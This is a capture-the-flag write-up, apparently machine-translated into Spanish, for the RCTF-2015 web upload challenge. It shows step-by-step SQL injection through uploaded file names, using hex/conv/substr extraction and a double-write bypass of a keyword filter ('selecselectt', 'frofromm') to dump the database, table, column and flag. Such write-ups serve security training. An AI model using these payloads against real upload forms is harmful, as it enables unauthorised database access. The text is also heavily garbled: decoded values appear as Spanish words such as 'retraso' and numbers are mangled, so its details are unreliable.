XCTF carga web (RCTF-2015)
Más de doscientos días de los problemas no resueltos ,,,,
preguntas abiertas, se encontró la necesidad de Inicio de sesión Registro ,, tenemos que cargar los archivos de registro después de la visita:
la página de inicio de sesión y reckon página de registro sin defectos, después de todo ,,,,, presentación tarea es hacer subimos ,,
rutinas de carga han sido probados, solamente carga imágenes JPG ,,,, no ,,, todos los otros caminos y no saben cuántos ,,,
hay una nota después de una exitosa la subida de imágenes JPG:
extraño fluido ,,, ,,, ,, archivos de carga como el número de bases de datos se mostrarán en la página ,,
dudan de la imagen se almacena en la base de datos ,, nombre de inyección de SQL ,,, imagen posible
para subir una 1'.jpgfoto encontró la página no muestra ninguna ,,, instrucción SQL puede ser debido a un error causado!
instrucción de inserción de base de datos back-end posible
INSERT INTO `xxx`(`id`, `name`) VALUES ('id号','图片名')
uso propio de la base de datos para probar y se encontró que la fotografía se denomina '+database()+'.jpg, los resultados obtenidos en la base de datos es 0 ,,,,
reconstruido '+hex(database())+'.jpg, el número hexadecimal se almacena en la base de datos ,,,
configuración de '+hex(database())+'.jpgcarga, llegar eco página: 7765625
se puede convertir en web ,,, no puede haber vuelta 5 en web, la espalda no puede faltar una ,,,
función conv luego por conversión hexadecimal a decimal y de salida ,, '+(conv(hex(database()),16,10))+'.jpg
puede ser demasiado tiempo para utilizar el número de a ,, para la notación científica reconfigurado usando mediados función de dividir:
'+(conv(mid(hex(database()),1,12),16,10))+'.jpg
Los hallazgos sugieren ,,, inyección SQL
reemplazado función substr:
'+(conv(substr(hex(database()),1,12),16,10))+'.jpg
Echo: 131.277.325.825.392
consiguió la cadena después de la conversión: "web_up"
para continuar:
'+(conv(substr(hex(database()),13,12),16,10))+'.jpg
Echo: 1819238756
conseguir la cadena después de la conversión: "la carga"
del bien, la estructura del examen se echó instrucción SQL tabla:
'+(conv(substr(hex((select table_name from information_schema.tables where table_schema='web_upload' limit 1,1)),1,12),16,10))+'.jpg
Descubrimiento filtrar el selecto ,, así como de ,,,
tratar de eludir el doble escribió:
'+(conv(substr(hex((selecselectt table_name frofromm information_schema.tables where table_schema='web_upload' limit 1,1)),1,12),16,10))+'.jpg
Puenteado con éxito, obtener Echo: 114.784.820.031.327
obtener la cadena: "Hello_"
seguir eco: 112.615.676.665.705
obtener la cadena: "flag_i"
seguir eco: 126.853.610.566.245
obtener la cadena: "s_here"
permiso, obtener el nombre de la tabla: hello_flag_is_here
Continuar estallido nombre de la columna:
'+(conv(substr(hex((selecselectt column_name frofromm information_schema.columns where table_name='hello_flag_is_here' limit 0,1)),1,12),16,10))+'.jpg
Continuará eco: 115.858.377.367.398
obtener la cadena: "i_am_f"
continúan eco: 7102823
obtener la cadena: "retraso"
obtener el nombre de la columna: i_am_flag
A continuación, el último paso, los valores de ráfaga:
'+(conv(substr(hex((selecselectt i_am_flag frofromm hello_flag_is_here limit 0,1)),1,12),16,10))+'.jpg
Siguen resonando: 36427215695199
obtener la cadena: "!! _ @ m_"
siguen resonando: 92806431727430
obtener la cadena: "Th.e_F"
siguen resonando: 560750951
obtener la cadena: "retraso"
obtener valores de los indicadores:!!_@m_Th.e_F!lag
Las subidas y bajadas hasta el final, el punto es examinar la inyección de SQL, pero no saben dónde estudiar sobre cómo hacer punto para elaborar ,,,,
sino también un proceso de techo duro poco, impaciente estimado no podía conseguir en,
